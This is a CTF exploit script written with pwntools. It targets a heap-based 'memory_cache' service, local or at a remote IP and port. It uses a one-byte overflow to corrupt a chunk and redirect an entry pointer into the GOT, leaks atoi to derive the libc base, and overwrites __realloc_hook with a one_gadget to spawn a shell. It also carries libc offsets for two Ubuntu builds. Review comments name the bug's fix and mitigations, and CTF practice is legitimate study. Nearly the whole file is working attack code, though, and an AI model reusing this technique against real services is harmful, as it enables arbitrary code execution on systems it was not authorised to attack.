full exploit memory cache
from pwn import * | |
import time | |
REMOTE = False
DEBUG = False

# Target selection: the remote CTF service when REMOTE is set, otherwise a
# local copy of the binary spawned as a child process.
p = remote("103.55.141.111", 2954) if REMOTE else process("./memory_cache")

# With DEBUG set, block here until a debugger attaches to the child.
if DEBUG:
    proc.wait_for_debugger(p.pid)
def set_cache(name, size, value, wait=True):
    """Issue one SET command to the service.

    The command line, the size and the value are sent as three separate
    lines with a short pause after each (the author's pacing; the reason
    is not stated in this file). With ``wait`` set, the call blocks until
    the service has answered "OK".
    """
    for line in ("SET " + name, str(size), value):
        p.sendline(line)
        time.sleep(0.1)
    if wait:
        p.readuntil("OK")
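def get_cache(name):
    """Issue one GET command and return the value line the service prints.

    The reply is expected to contain ", " before the value: everything up
    to and including that separator is consumed and discarded, and the rest
    of the line is returned exactly as ``readline()`` delivers it.
    """
    p.sendline("GET " + name)
    # The prefix before the separator is never used, so it is not kept.
    p.readuntil(", ")
    return p.readline()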
# Wait for init
time.sleep(1)
print p.readline()

# align heap
# Four SETs establish the heap layout the rest of the script relies on; the
# steps below depend on this exact order, so it must not be changed.
set_cache("a", 24, "a"*24)
set_cache("b", 56, "b"*56)
set_cache("a", 56, "a"*56)
set_cache("c", 56, "c"*56)

# overflow chunk `a` size
# Declares 57 bytes for an entry that was stored with 56; the single extra
# byte (0xff) is the out-of-bounds write the comment above describes.
# NOTE(review): the service-side root cause is not visible from this script,
# but checking the declared size against the entry's allocated capacity on
# every SET is the fix that would stop this step. A SET whose size exceeds
# the earlier allocation for the same key is also the observable anomaly in
# the protocol stream.
set_cache("b", 57, "b"*56 + "\xff")

# overwrite c->data pointer to got for get got table value
# The qwords after the 56-byte filler rebuild what appears to be the header
# of entry `c` (the same three large constants are written back unchanged by
# the second SET further down); the final qword, 0x602048, is the pointer the
# comment refers to. What the three constants represent is not established
# in this file.
set_cache("a", 112, "a"*56 + p64(0x41) + p64(0xcfc6e51e26fd662b) + p64(0x00b6ba66a47fdec8) + p64(0x00000000694ffebc) + p64(8) + p64(0x0000000000602048))
leak = get_cache("c")

# leak got and search for libc version
# Bare string left as the author's scratch notes: the loop used to dump the
# leaked qwords and the symbol addresses observed when identifying the libc.
"""
leak_libc = []
for i in range(0, 64, 8):
print hex(u64(leak[i:i+8]))
read 0x7f95c0b91220
__libc_start_main 0x7f95c0aba740
SHA1_Init 0x7f95c0ecebc0
free 0x7f95c0b1e4f0
strlen 0x7f95c0b25720
atoi 0x7f95c0ad0e80
SHA1_Final 0x7f95c0ecea20
strchr 0x7f95c0b23ab0
"""

# Offsets are specific to the libc build named in each branch; using them
# against any other build produces wrong addresses.
if REMOTE:
    # libc version libc6_2.23-0ubuntu10_amd64
    atoi_offset = 0x036e80
    _realloc_hook_offset = 0x3c4b08
    one_gadget_offset = 0xf1147
else:
    # libc version libc6_2.27-3ubuntu1_amd64
    atoi_offset = 0x40680
    _realloc_hook_offset = 0x3ebc28
    one_gadget_offset = 0x10a38c

# The first leaked qword is taken to be atoi's address (consistent with the
# entry `c` pointer set above); libc's base is derived from it.
print "atoi addr: " + hex(u64(leak[:8]))
libc_base = u64(leak[:8]) - atoi_offset
print "base libc: " + hex(libc_base)
_realloc_hook_addr = libc_base + _realloc_hook_offset
print "__realloc_hook addr: " + hex(_realloc_hook_addr)
one_gadget_addr = libc_base + one_gadget_offset
print "one gadget addr: " + hex(one_gadget_addr)

# overwrite _realloc_hook to one gadget
# Same header rewrite as before, now with size 96 and a pointer near the
# hook. The following GET/SET pair writes the 11 leaked bytes back unchanged
# and only then the 8-byte address, so the hook qword is the sole change.
# NOTE(review): this step relies on a writable libc malloc hook; those hooks
# were removed in glibc 2.34, and a partial-RELRO GOT is what made the
# earlier leak possible, so full RELRO plus a modern libc removes both.
set_cache("a", 112, "a"*56 + p64(0x41) + p64(0xcfc6e51e26fd662b) + p64(0x00b6ba66a47fdec8) + p64(0x00000000694ffebc) + p64(96) + p64(_realloc_hook_addr - 8 - 8 + 5))
leak = get_cache("c")
set_cache("c", 19, leak[:11] + p64(one_gadget_addr))

# trig realloc and get shell
# wait=False because no "OK" is expected once the hook fires.
set_cache("d", 1, "", False)
p.interactive()